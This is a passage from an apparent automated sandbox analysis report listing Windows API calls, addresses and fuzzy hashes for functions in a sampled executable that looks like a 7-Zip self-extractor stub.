                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                        • Opcode ID: f79fff84bd0e040257a36252c66a406e8276e4d7bddcf747b47657c9f69a0d49
                                                                                                                                        • Instruction ID: 6fac46e23173c77b6da9288ddc2accfa11a1bb9d9b8ef9c94bf40dac47475653
                                                                                                                                        • Opcode Fuzzy Hash: f79fff84bd0e040257a36252c66a406e8276e4d7bddcf747b47657c9f69a0d49
                                                                                                                                        • Instruction Fuzzy Hash: C5C0123220C520974A15BE359400CCB73E4BF59310300484FE88993645D638BD814B9D
                                                                                                                                        APIs
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0040119C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                        • Opcode ID: 053bab089f67fb7da11783392dabcaa5bb2c6350295daccf07d3f923137bd5e8
                                                                                                                                        • Instruction ID: 80e429c9655060905b03d38468354203b5df30ae66867c399f2ea5f3bf3c7cce
                                                                                                                                        • Opcode Fuzzy Hash: 053bab089f67fb7da11783392dabcaa5bb2c6350295daccf07d3f923137bd5e8
                                                                                                                                        • Instruction Fuzzy Hash: 87C08C36190203CBC7004F30CC026457BE1BBA0714B6486A8A065C63B0DA3EC448CA01
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                        • Opcode ID: 49818983c7c4313c622f2e86d7746392ff58400d4958ac86d60063aa5157a66c
                                                                                                                                        • Instruction ID: 2bfd4fe5492bcf1d3212a322bb009ce45eed1b46813e47afac693d05b876fedf
                                                                                                                                        • Opcode Fuzzy Hash: 49818983c7c4313c622f2e86d7746392ff58400d4958ac86d60063aa5157a66c
                                                                                                                                        • Instruction Fuzzy Hash: 0BC09B753181049BC718FF21C450817B365AB64714714C85FF84C55547CA3BDC82E618
                                                                                                                                        APIs
                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?,004124A9,00000000,00000000,?,004012DC,?), ref: 0041248D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileTime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1425588814-0
                                                                                                                                        • Opcode ID: a76d94471d75101d3d19dad7ac3713a68ec5cb13f5505408d5a5f3094a28fb24
                                                                                                                                        • Instruction ID: f7402770b179a49de0ab9fe0b192ea54849ac29a58fff8f6d7b1295910a8291e
                                                                                                                                        • Opcode Fuzzy Hash: a76d94471d75101d3d19dad7ac3713a68ec5cb13f5505408d5a5f3094a28fb24
                                                                                                                                        • Instruction Fuzzy Hash: 31C04C36159105FF8F020F70CC04C1ABFA2AB99311F10CA18B155C4074C7328034EB12
                                                                                                                                        APIs
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00000000,?,?,?,?,?,?,00401AD3,?), ref: 004015F7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1033339047-0
                                                                                                                                        • Opcode ID: 3a0bd8ffb75a7d0c1b376548dc289f793da2ad7584b55b5230689940060f599c
                                                                                                                                        • Instruction ID: 576c3123db9d42ad6f26370305c4fe05627a80a4f610c37a806172f0a9a2cc4a
                                                                                                                                        • Opcode Fuzzy Hash: 3a0bd8ffb75a7d0c1b376548dc289f793da2ad7584b55b5230689940060f599c
                                                                                                                                        • Instruction Fuzzy Hash: C5318271910115ABDB10EFE5CC84CEFB7B8EF48344B15087BE441B72A1D7799E818B69
                                                                                                                                        APIs
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000060), ref: 00412927
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1033339047-0
                                                                                                                                        • Opcode ID: 6debaf52b1a4c8e37dc45691c4e1b6b73fa31808f858abb765b60bcf64e2121f
                                                                                                                                        • Instruction ID: 8d352c1c46fd1df2ac59e7115e7018534418c9226e76046c12a2ea9475f01b4a
                                                                                                                                        • Opcode Fuzzy Hash: 6debaf52b1a4c8e37dc45691c4e1b6b73fa31808f858abb765b60bcf64e2121f
                                                                                                                                        • Instruction Fuzzy Hash: 3F21C3717142869BCF34FF658A904EB7395AF40314B14462FE482D3201C7B8ADE5CB5E
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNELBASE(?,?,00412376,00000000,?,004123BE,?,80000000,?,?,?,004123E0,?,?,00000003,00000080), ref: 004122A5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                        • Opcode ID: bf632d426777a13286a7d214fabf0ee7930240e4f00ef32643c6c823c72a12ea
                                                                                                                                        • Instruction ID: 2edd4d7db1caf844859ff0a1764f07c4c63b16d89aef5b3dab10146b982c9a76
                                                                                                                                        • Opcode Fuzzy Hash: bf632d426777a13286a7d214fabf0ee7930240e4f00ef32643c6c823c72a12ea
                                                                                                                                        • Instruction Fuzzy Hash: 4DD01231604161468E745E3C7A445D637D85A06370321079BF4B5C32E1D3B58CD35A98
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,004133A4,?,?,?,0040C03F,?), ref: 00402A4B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: d52152f8240d310394afd4d808f8c2102ad5bdb202a27d84af0ad2d18dcc3f18
                                                                                                                                        • Instruction ID: 5872fe86412dcdd468f52b7ecb5979782df8fbe157f8593837c634c381a8cb4c
                                                                                                                                        • Opcode Fuzzy Hash: d52152f8240d310394afd4d808f8c2102ad5bdb202a27d84af0ad2d18dcc3f18
                                                                                                                                        • Instruction Fuzzy Hash: 5FC08C703483007AEE211B748F0BB4B3653AF84B16F90C029F348B40E0CBF58410AA0A
                                                                                                                                        APIs
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00004B38), ref: 00412245
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1033339047-0
                                                                                                                                        • Opcode ID: 60ec2abcf5a6396ef8d7bbb53f790590f8d628139c26fe78cb856bdba3517ae4
                                                                                                                                        • Instruction ID: 3495fa19a298e49cc2800c4131356790e1569378de7ddbf050defd7ea7821dd7
                                                                                                                                        • Opcode Fuzzy Hash: 60ec2abcf5a6396ef8d7bbb53f790590f8d628139c26fe78cb856bdba3517ae4
                                                                                                                                        • Instruction Fuzzy Hash: 40B012E474010671AE4420721F132EF20C007D1385F0408B7AA07E42C2FEDCCAE5912F
                                                                                                                                        APIs
                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00413333,00000000,?,0041339B,?,?,0040C03F,?), ref: 00402002
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                        • Opcode ID: ef87b2e52dde92dd11102c14b5a17c3afe989afc729bbcebbe3bdea788540431
                                                                                                                                        • Instruction ID: 703a6ff84afb8074b9885b8fa9c0ccab1db7962bc4b9572073b4c9a6fb1bc3a6
                                                                                                                                        • Opcode Fuzzy Hash: ef87b2e52dde92dd11102c14b5a17c3afe989afc729bbcebbe3bdea788540431
                                                                                                                                        • Instruction Fuzzy Hash: 8DB09230285700BAEF224B00DE0DB4A76A0BB80B06F24C428B288240E087B86818DA0E
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                                                                                                                        • wsprintfW.USER32 ref: 004024DD
                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                                                                                                                        • GetLastError.KERNEL32 ref: 004024F7
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                                                                                                                        • GetLastError.KERNEL32 ref: 0040252C
                                                                                                                                        • lstrcmpiW.KERNEL32(00AA90C0,?), ref: 00402541
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00AA90C0), ref: 00402551
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040256F
                                                                                                                                        • SetLastError.KERNEL32(00000003), ref: 00402578
                                                                                                                                        • lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                                                                                                                        • _wtol.MSVCRT ref: 0040260A
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,0041B328,00000001,00AA90C0,00000002), ref: 0040262A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                                                                                        • String ID: 7zSfxString%d
                                                                                                                                        • API String ID: 2117570002-3906403175
                                                                                                                                        • Opcode ID: eba394e492bfb50e151d824ecc1c1c613fe538debf7ee36fbf13e84896701797
                                                                                                                                        • Instruction ID: 1954578a42ed511618fabe736ee1125ec7d3cad31fc3f85986fc13fa068848c6
                                                                                                                                        • Opcode Fuzzy Hash: eba394e492bfb50e151d824ecc1c1c613fe538debf7ee36fbf13e84896701797
                                                                                                                                        • Instruction Fuzzy Hash: 9951A379900214FFDB10DF75DD49ADABBA9FB08340F10443AE946E62D0E7B8A951CB1D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                                                                                          • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                                                                                        • GetDlgItem.USER32(?,000004B8), ref: 004092EE
                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004092FD
                                                                                                                                        • GetDlgItem.USER32(?,000004B5), ref: 00409344
                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00409349
                                                                                                                                        • GetDlgItem.USER32(?,000004B5), ref: 00409359
                                                                                                                                        • SetWindowLongW.USER32(00000000), ref: 0040935C
                                                                                                                                        • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00409382
                                                                                                                                        • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00409394
                                                                                                                                        • GetDlgItem.USER32(?,000004B4), ref: 0040939E
                                                                                                                                        • SetFocus.USER32(00000000), ref: 004093A1
                                                                                                                                        • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004093D0
                                                                                                                                        • CoCreateInstance.OLE32(0041C464,00000000,00000001,0041BD6C,?), ref: 004093F4
                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00409411
                                                                                                                                        • IsWindow.USER32(00000000), ref: 00409414
                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00409424
                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00409427
                                                                                                                                        • GetDlgItem.USER32(?,000004B5), ref: 0040943B
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 0040943E
                                                                                                                                          • Part of subcall function 0040819E: GetDlgItem.USER32(?,000004B6), ref: 004081AC
                                                                                                                                          • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                                                                                                                          • Part of subcall function 00408E76: LoadIconW.USER32(00000000), ref: 00408EA2
                                                                                                                                          • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                                                                                                                          • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                                                                                                                          • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                                                                                                                          • Part of subcall function 00408E76: LoadImageW.USER32(00000000), ref: 00408EC7
                                                                                                                                          • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                                                                                                                          • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                                                                                                                          • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                                                                                                                          • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                                                                                                                          • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                                                                                                                          • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                                                                                                                          • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                                                                                                                          • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                                                                                                                          • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                                                                                                                          • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1057135554-0
                                                                                                                                        • Opcode ID: ba3a8e7896f853d1d8996d9c4767784286a57f8b05f592c4c5be814e68872b41
                                                                                                                                        • Instruction ID: 5db8082ad3932120c1d3ad580c4d4a8d12b10d7a787853330903dc21ac74032f
                                                                                                                                        • Opcode Fuzzy Hash: ba3a8e7896f853d1d8996d9c4767784286a57f8b05f592c4c5be814e68872b41
                                                                                                                                        • Instruction Fuzzy Hash: E54184B0605708AFDA246F22DD49F6B7B9DFF44B04F00843EF955A62E1CB79A850CA1D
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004020CA
                                                                                                                                        • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 004020E7
                                                                                                                                        • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 004020FB
                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 0040210C
                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00402116
                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00402121
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 0040214D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00402156
                                                                                                                                        • wsprintfW.USER32 ref: 00402175
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 0040218A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040218D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                                                                                        • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                                                                                        • API String ID: 2639302590-365843014
                                                                                                                                        • Opcode ID: 4509f4e0e8980c838efd414ca7c3a82435c9d4736e02e482c88f6a1a6bb26b48
                                                                                                                                        • Instruction ID: 092f3855134823e072dda954e94301c8fdf66ebe7b0f0e4b82829ee13f00460f
                                                                                                                                        • Opcode Fuzzy Hash: 4509f4e0e8980c838efd414ca7c3a82435c9d4736e02e482c88f6a1a6bb26b48
                                                                                                                                        • Instruction Fuzzy Hash: 7C21B0B5941308BBDB119BA59C08F9B3ABCEB44711F108422FA04E72D0D6B8CD108BA9
                                                                                                                                        APIs
                                                                                                                                        • wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                                                                                        • GetLastError.KERNEL32 ref: 0040963B
                                                                                                                                        • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                                                                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0040968B
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00409692
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                                                                                        • lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004096E1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 829399097-0
                                                                                                                                        • Opcode ID: e19ea4daa404c5e85e295f528f45600472c05eaa69f6bcc88292a866bb27d639
                                                                                                                                        • Instruction ID: 0f5aa2174aa9d056a6dafd0f9c7aa592ac4ad2a583e4ab7749965f253d727b0f
                                                                                                                                        • Opcode Fuzzy Hash: e19ea4daa404c5e85e295f528f45600472c05eaa69f6bcc88292a866bb27d639
                                                                                                                                        • Instruction Fuzzy Hash: F0216176800108FFDB159FA1DC85DEB7BACEF08354B10847BF946A6191EA359E84CBA4
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,0041A68C,?,?,?,00000000), ref: 0040320B
                                                                                                                                        • lstrcmpW.KERNEL32(?,0041A688,?,0000005C,?,?,?,00000000), ref: 0040325E
                                                                                                                                        • lstrcmpW.KERNEL32(?,0041A680,?,?,00000000), ref: 00403274
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 0040328A
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00403291
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 004032A3
                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,00000000), ref: 004032B2
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 004032BD
                                                                                                                                        • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 004032C6
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004032D1
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004032DC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
